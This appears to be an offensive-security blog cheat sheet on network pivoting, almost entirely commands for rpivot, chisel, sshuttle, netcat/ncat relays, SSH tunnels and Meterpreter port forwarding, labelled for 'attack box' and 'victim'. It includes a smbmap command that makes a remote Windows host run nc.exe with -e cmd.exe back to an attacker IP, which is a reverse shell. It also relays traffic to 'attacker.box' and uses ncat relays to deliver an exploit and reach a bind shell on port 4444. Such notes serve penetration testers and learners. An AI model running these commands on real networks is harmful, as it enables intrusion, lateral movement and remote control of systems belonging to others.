Pivoting

rpivot

https://github.com/klsecservices/rpivot

Start server listener on port 9999, which creates a socks 4 proxy on 127.0.0.1:1080 upon connection from client:

python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

1 2	python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

Connect to Server:

python client.py --server-ip 10.1.1.1 --server-port 9999

1 2	python client.py --server-ip 10.1.1.1 --server-port 9999

Using single zip file mode:

zip rpivot.zip -r *.py ./ntlm_auth/
python rpivot.zip server &lt;server_options&gt;
python rpivot.zip client &lt;client_options&gt;

zip rpivot.zip -r *.py ./ntlm_auth/

python rpivot.zip server <server_options>

python rpivot.zip client <client_options>

Use proxychains to launch tools through the tunnel

proxychains smbmap -u 'user2' -p 'passwd' -d WORKGROUP -H 10.11.x.49 -x 'C:\Windows\Tasks\nc.exe 10.11.0.30 1234 -e cmd.exe'

1 2	proxychains smbmap -u 'user2' -p 'passwd' -d WORKGROUP -H 10.11.x.49 -x 'C:\Windows\Tasks\nc.exe 10.11.0.30 1234 -e cmd.exe'

Set following in /etc/proxychains.conf socks4 127.0.0.1 1080

Example:

On Attack box:

python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

1 2	python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

On Victim:

./client --server-ip 10.xx.0.30 --server-port 9999

1 2	./client --server-ip 10.xx.0.30 --server-port 9999

sshuttle

sshuttle -r root@10.1.1.1 10.2.2.0/24

1 2	sshuttle -r root@10.1.1.1 10.2.2.0/24

Chisel

git clone https://github.com/jpillora/chisel.git
go build

From Kali:

./chisel_linux_386 client 10.xx.xx.49:60001 8088:10.xx.1.223:80

1 2	./chisel_linux_386 client 10.xx.xx.49:60001 8088:10.xx.1.223:80

From Victim:

chisel_windows_386.exe server -p 60001

1 2	chisel_windows_386.exe server -p 60001

Bind method:

On the DMZ / target Box, we run a simple listener to client relay:

nc -l -p 1521 -e “nc internal.db.srv 1521”

1 2	nc -l -p 1521 -e “nc internal.db.srv 1521”

Now, if the attacker connects to port 1521 of the DMZ Box, his connection will infact be routed to port 1521 of the internal server running Oracle. Hence interaction with the db is possible which was previously inaccessible.

Reverse method:

This time we’ll use listener to listener and client to client relays in netcat to Reverse Connect to attacker’s box. This method comprises of two parts –
a) Establish a client to client relay on the DMZ box that connects to both the attacker’s box on port 80 and the internal.db.srv box on port 1521.
b) Establish a listener to listener relay that binds to both port 80 and port 1521 on the attacker’s box. Steps (must be done in the following order)-

On the attacker’s Linux Box, we run a listener to listener relay,

nc -l -p 80 -e “nc -l -p 1521”

1 2	nc -l -p 80 -e “nc -l -p 1521”

2.While on the DMZ Box, we run a client to client relay,

nc attacker.box 80 -e “nc internal.db.srv 1521”

1 2	nc attacker.box 80 -e “nc internal.db.srv 1521”

netcat

Reverse On our attacking machine, we setup a listener-to-listener relay using the following command:

ncat -lv --broker -m2 10000

1 2	ncat -lv --broker -m2 10000

At this point, we’ll have port 10000 listening on our machine. On the web server we execute the following command:

ncat -v 192.168.81.125 10000 -c "ncat -v 192.168.63.142 10000"

1 2	ncat -v 192.168.81.125 10000 -c "ncat -v 192.168.63.142 10000"

Ncat: Version 5.51
Ncat: Connected to 192.168.81.125:10000.
Ncat: Version 5.51
Ncat: Connected to 192.168.63.142:10000.

This tells ncat to connect to our ncat instance listening on port 10000, and then to connect to port 10000 on the target. This completes the setup, and data from our machine will flow through the web server and to the target. Note that the syntax for executing the client-to-client relay on the pivot is the same, regardless of whether it’s a Linux, Windows, or OS X machine. There’s nothing else that needs to be done, such as creating a pipe. Compare it to the technique that uses traditional netcat to see the difference. We can now execute our exploit. Keep in mind that we need to send it to port 10000 on our machine:

./exploit.py 127.0.0.1 10000
[+] sending payload of length 1479 [+] done

Bind

With the exploit sent, we can now terminate the ncat relays. Assuming the exploit worked, a bind shell should be listening on 4444 on the target. In order to access it, we once again setup ncat relays, only this time we’ll specify port 4444. On our machine we run the following command:

ncat -lv --broker -m2 4444

1 2	ncat -lv --broker -m2 4444

On the web server, we setup the client-to-client relay:

ncat -v 192.168.81.125 4444 -c "ncat -v 192.168.63.142 4444"

1 2	ncat -v 192.168.81.125 4444 -c "ncat -v 192.168.63.142 4444"

Ncat: Version 5.51
Ncat: Connected to 192.168.81.125:4444.
Ncat: Version 5.51
Ncat: Connected to 192.168.63.142:4444.

Using netcat (or ncat), we can connect to port 4444 on our machine to get a remote shell on the target:

nc -v 127.0.0.1 4444

1 2	nc -v 127.0.0.1 4444

SSH

Reverse SSH Tunneling

ssh -R 3388:localhost:3389 -p SSH-PORT user@sshserver

1 2	ssh -R 3388:localhost:3389 -p SSH-PORT user@sshserver

Local SSH Tunneling

ssh -L 4443:10.0.0.4:443 -p SSH-PORT user@sshserver

1 2	ssh -L 4443:10.0.0.4:443 -p SSH-PORT user@sshserver

Connect to https://localhost:4443

SSH as a SOCKS Proxy

ssh -D 8888 user@ssh-server

1 2	ssh -D 8888 user@ssh-server

Set your web browser to use localhost on port 8888 as SOCKS Proxy, and all your HTTP/HTTPS requests will go through the SSH tunnel. Or use Proxychains to execute tools over the Proxy connection.

Metasploit Meterpreter

Create portforwarding via Meterpreter session.

portfwd add -l 3333 -p 80 -r TargetIP

1 2	portfwd add -l 3333 -p 80 -r TargetIP

Create socks proxy via Meterpreter, then use Proxychains to run tools through the tunnel to target.

use auxiliary/server/socks4a

1 2	use auxiliary/server/socks4a

Tags: pivot, proxychains

OffSec Blog

Pivoting

Category

Archives

Meta